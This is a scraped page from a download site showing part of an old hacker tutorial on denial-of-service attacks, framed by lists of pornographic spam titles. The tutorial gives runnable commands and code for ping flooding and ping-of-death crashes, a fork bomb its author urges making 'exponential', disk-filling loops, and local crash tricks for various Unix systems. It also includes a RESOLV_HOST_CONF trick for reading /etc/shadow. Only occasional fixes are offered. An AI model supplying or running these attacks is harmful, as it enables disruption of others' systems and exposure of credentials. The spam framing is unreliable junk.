亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? introduction to denial of service.txt

?? 黑客培訓教程
?? TXT
?? 第 1 頁 / 共 4 頁
字號:
	[.2.] http://jya.com/floodd.txt
	2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

	[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
	IP-spoofing Demystified by daemon9 / route / infinity
     	for Phrack Magazine

.C.23. PING FLOODING
--------------------

I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.

Under Unix we could try something like: ping -s host
to send 64 bytes packets. 

If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.

.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
----------------------------------------------------------

If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:

ping -l 65510 address.to.the.machine

And the machine will freeze or reboot.

Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).

.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
--------------------------------------------------

The subnet mask reply message is used under the reboot, but some
hosts are known to accept the message any time without any check.
If so all communication to or from the host us turned off, it's dead.

The host should not accept the message any time but under the reboot.

.C.26. FLEXlm
-------------

Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm lmdown command.

# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#

.C.27. BOOTING WITH TRIVIAL FTP
-------------------------------

To boot diskless workstations one often use trivial ftp with rarp or
bootp. If not protected an attacker can use tftp to boot the host.


.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.D.1. KERNEL PANIC UNDER SOLARIS 2.3
------------------------------------

Solaris 2.3 will get a kernel panic if this
is executed:

EX:
	
	$ndd /dev/udp udp_status

The solution is to install the proper patch.

.D.2. CRASHING THE X-SERVER
---------------------------

If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0
be removed and the x-server will crash.

Ex:

	$ rm /tmp/.x11-unix/x0

.D.3. FILLING UP THE HARD DISK
-----------------------------

If your hard disk space is not limited by a quota or if you can use
/tmp then it`s possible for you to fill up the file system.

Ex:

	while : ;
	mkdir .xxx
	cd .xxx
	done

.D.4. MALICIOUS USE OF eval
---------------------------

Some older systems will crash if eval '\!\!' is executed in the
C-shell.

Ex:
 
	% eval '\!\!'
	
.D.5. MALICIOUS USE OF fork() 
-----------------------------

If someone executes this C++ program the result will result in a crash
on most systems.

Ex:
	
	#include <sys/types.h>
	#include <unistd.h>
	#include <iostream.h>
	
	main()
	{
		int x;
		while(x=0;x<1000000;x++)
			{
				system("uptime");
				fork();
			}
	}

You can use any command you want, but uptime is nice
because it shows the workload.

To get a bigger and very ugly attack you should however replace uptime
(or fork them both) with sync. This is very bad.

If you are real mean you could also fork a child process for
every child process and we will get an exponential increase of
workload. 

There is no good way to stop this attack and
similar attacks. A solution could be to place a limit
on time of execution and size of processes.

.D.6. CREATING FILES THAT IS HARD TO REMOVE
-------------------------------------------

Well all files can be removed, but here is some ideas:

Ex.I.

	$ cat > -xxx
	^C
	$ ls
	-xxx
	$ rm -xxx
	rm: illegal option -- x
	rm: illegal option -- x
	rm: illegal option -- x
	usage: rm [-fiRr] file ...
	$

Ex.II.

	$ touch xxx!
	$ rm xxx!
	rm: remove xxx! (yes/no)? y
	$ touch xxxxxxxxx!
	$ rm xxxxxxxxx!
	bash: !": event not found
	$

	(You see the size do count!)

Other well know methods is files with odd characters or spaces
in the name. 

These methods could be used in combination with ".D.3 FILLING UP THE
HARDDISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindow:s File
Manager. You can also try to use: rm ./<filename>. It should work for
the first example if you have a shell.

.D.7. DIRECTORY NAME LOOKUPCACHE
--------------------------------

Directory name lookupcache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file to a vnode. But DNLC can only
operate on files with names that has less than N characters (for SunOS 4.x
up to 14 character, for Solaris 2.x up 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.

Create lets say 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.

If the impact is not big enough you should create more files or launch
more processes.
 
.D.8. CSH ATTACK
----------------

Just start this under /bin/csh (after proper modification) 
and the load level will get very high (that is 100% of the cpu time) 
in a very short time. 

Ex:

	|I /bin/csh
	nodename : **************b

.D.9. CREATING FILES IN /tmp
----------------------------

Many programs creates files in /tmp, but are unable to deal with the problem
if the file already exist. In some cases this could be used for a
denial of service attack.

.D.10. USING RESOLV_HOST_CONF
-----------------------------

Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is 
read in the variable and access through ping.

Ex:
	
	$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf

.D.11. SUN 4.X AND BACKGROUND JOBS	
----------------------------------

Thanks to Mr David Honig <honig@amada.net> for the following:

" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root login as the kernel process table fills."

" The cute thing is the size of the 
script, and how few keystrokes it takes to bring down a Sun
as a regular user."

.D.12. CRASHING DG/UX WITH ULIMIT 
---------------------------------

ulimit is used to set a limit on the system resources available to the 
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the 
passwd file be set to zero.

.D.13. NETTUNE AND HP-UX
------------------------

/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:

	- arp_killcomplete 
	- arp_killincomplete
	- arp_unicast 
	- arp_rebroadcast
	- icmp_mask_agent
	- ip_defaultttl
	- ip_forwarding
	- ip_intrqmax
	- pmtu_defaulttime
	- tcp_localsubnets
	- tcp_receive
	- tcp_send
	- tcp_defaultttl
	- tcp_keepstart 
	- tcp_keepfreq
	- tcp_keepstop
	- tcp_maxretrans
	- tcp_urgent_data_ptr
	- udp_cksum
	- udp_defaultttl 
	- udp_newbcastenable 
	- udp_pmtu
	- tcp_pmtu
	- tcp_random_seq

The solution could be to set the proper permission on 
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.14. SOLARIS 2.X AND NFS
--------------------------

If a process is writing over NFS and the user goes over the disk
quota will the process go into an infinite loop.

.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
--------------------------------------------------

By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.

$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b

The solution could be to set the proper permission on 
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
----------------------------------------------------

Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.


.E. DUMPING CORE
~~~~~~~~~~~~~~~~

.E.1. SHORT COMMENT
-------------------

The core dumps things don't really belongs in this paper but I have
put them here anyway.

.E.2. MALICIOUS USE OF NETSCAPE
-------------------------------

Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.

Ex:

	<a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...>

.E.3. CORE DUMPED UNDER WUFTPD
------------------------------

A core dumped could be created under wuftp with two different
methods:

	(1) Then pasv is given (user not logged in (ftp -n)). Almost all
	versions of BSD:s ftpd.
	(2) More than 100 arguments is given with any executable
	command. Presents in all versions of BSD:sd ftpd.

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲美女免费在线| 日韩电影在线一区| 无码av免费一区二区三区试看| 久草热8精品视频在线观看| 99re这里只有精品首页| 日韩午夜在线观看| 国产日韩欧美一区二区三区综合| 日韩毛片在线免费观看| 日韩成人免费电影| www.欧美日韩| 日韩视频一区在线观看| 中文字幕一区二区三区蜜月| 亚洲电影一区二区三区| 国产在线精品国自产拍免费| 91久久精品一区二区二区| 国产精品色婷婷| 亚洲电影你懂得| 91亚洲男人天堂| 欧美变态tickling挠脚心| 日韩毛片精品高清免费| 国产99久久久国产精品免费看| 欧美亚洲高清一区二区三区不卡| 久久久久久久综合日本| 午夜精品视频一区| 成人涩涩免费视频| 精品国产自在久精品国产| 天天色综合成人网| 欧美高清dvd| 丝袜诱惑制服诱惑色一区在线观看 | 久久国产精品99久久人人澡| 欧美精品自拍偷拍| 天天综合网 天天综合色| 欧美日韩国产免费一区二区 | 一区二区三区在线视频免费观看| 国产成人在线看| 精品福利av导航| 日韩中文字幕一区二区三区| 91精品国产综合久久久久久漫画 | 久久99久久99小草精品免视看| 91精品国产麻豆| 美女视频黄频大全不卡视频在线播放| 91麻豆精品国产| 九色综合狠狠综合久久| 欧美成人高清电影在线| 国产一区二区视频在线播放| 国产日本欧洲亚洲| 国产69精品久久久久777| 欧美国产日韩精品免费观看| 99久久伊人网影院| 亚洲精品视频免费看| 3d动漫精品啪啪1区2区免费| 蜜臀久久99精品久久久久久9| 欧美精品一区二区在线播放| 高清不卡一区二区| 一级中文字幕一区二区| 欧美一区二区不卡视频| 国产一区二区免费在线| 欧美精彩视频一区二区三区| 日本韩国欧美一区二区三区| 日本欧美在线观看| 久久这里只有精品视频网| 不卡的av中国片| 亚洲成人免费视频| 日本一区二区三区免费乱视频| 欧美中文字幕一区| 亚洲在线成人精品| 国产亚洲人成网站| 欧美亚洲自拍偷拍| 国产成人亚洲综合a∨婷婷图片| 亚洲人成伊人成综合网小说| 日韩三级av在线播放| www.av精品| 三级久久三级久久久| 国产精品卡一卡二| 欧美一区二区精品在线| 成人aaaa免费全部观看| 日本成人中文字幕| 亚洲女爱视频在线| 日韩你懂的在线观看| 成人免费高清视频在线观看| 手机精品视频在线观看| 中文字幕在线观看不卡| 日韩欧美卡一卡二| 国产suv精品一区二区三区| 亚洲成人综合网站| 综合久久久久综合| 国产亚洲欧美日韩俺去了| 69av一区二区三区| 欧美午夜片在线观看| 成人午夜视频在线| 韩国中文字幕2020精品| 亚洲国产美女搞黄色| 中文字幕中文在线不卡住| 久久久99免费| 精品国产伦一区二区三区观看方式 | 懂色av一区二区三区免费观看 | 成人综合婷婷国产精品久久蜜臀 | 中文字幕一区二区三区不卡在线| 欧美电视剧在线观看完整版| 欧美高清dvd| 欧美久久久久久久久久| 99国产欧美另类久久久精品| 精品一区二区三区日韩| 美女尤物国产一区| 日韩**一区毛片| 免费欧美在线视频| 五月综合激情婷婷六月色窝| 一二三四区精品视频| 亚洲精品少妇30p| 亚洲精选视频在线| 亚洲精品免费在线观看| 亚洲三级电影全部在线观看高清| 国产片一区二区| 久久综合九色欧美综合狠狠 | 欧美日韩久久不卡| 欧美日韩午夜在线视频| 欧美日韩一区二区电影| 欧美性大战久久| 欧美精品粉嫩高潮一区二区| 欧美日韩你懂的| 91精品一区二区三区久久久久久 | 欧美日韩激情一区| 精品视频一区二区三区免费| 欧美日韩国产一级二级| 在线不卡中文字幕| 91精品国产欧美一区二区18| 精品国产亚洲在线| 国产欧美日韩久久| 成人免费在线视频| 亚洲最快最全在线视频| 丝袜美腿亚洲一区| 久久国产日韩欧美精品| 国产在线看一区| 豆国产96在线|亚洲| 日本高清不卡在线观看| 欧美精品一二三区| ww亚洲ww在线观看国产| 国产精品美女一区二区三区 | 欧美一级一区二区| 精品国产乱码久久久久久久| 欧美激情中文字幕| 亚洲一区二区在线观看视频| 蜜乳av一区二区| 成人高清免费观看| 欧美色图在线观看| 久久夜色精品一区| 亚洲男人都懂的| 国内外成人在线| 色婷婷精品久久二区二区蜜臂av | 成人国产视频在线观看| 欧美日韩日日夜夜| 中文字幕av在线一区二区三区| 亚洲精品欧美在线| 国产麻豆精品在线观看| 97精品超碰一区二区三区| 日韩免费看的电影| 亚洲欧美韩国综合色| 国产一区二区在线视频| 欧美日韩精品一区二区天天拍小说| 精品国产乱码久久久久久蜜臀| 亚洲精品福利视频网站| 国产精品一二二区| 91精品国产综合久久久久| 国产精品五月天| 久久99久久精品| 5566中文字幕一区二区电影 | 欧美国产激情二区三区| 日韩国产欧美视频| youjizz久久| 久久久久亚洲综合| 奇米影视一区二区三区| 成人av网站大全| 精品sm捆绑视频| 亚洲成人第一页| 91香蕉国产在线观看软件| 精品国产91久久久久久久妲己 | 爽爽淫人综合网网站| 91原创在线视频| 国产婷婷色一区二区三区四区| 免费看日韩精品| 欧美日韩在线电影| 亚洲精品欧美在线| 91视频免费播放| √…a在线天堂一区| 国产成人福利片| 久久久国产午夜精品 | 国产日韩欧美一区二区三区综合 | 精品久久人人做人人爰| 污片在线观看一区二区| 欧美日韩一卡二卡三卡| 亚洲小说欧美激情另类| 色丁香久综合在线久综合在线观看 | 亚洲国产精品久久一线不卡| 99久久国产免费看| 国产精品久久久久久久久免费桃花 | 欧美日韩欧美一区二区| 亚洲国产欧美日韩另类综合| 欧美三片在线视频观看| 香蕉av福利精品导航| 欧美高清视频在线高清观看mv色露露十八 |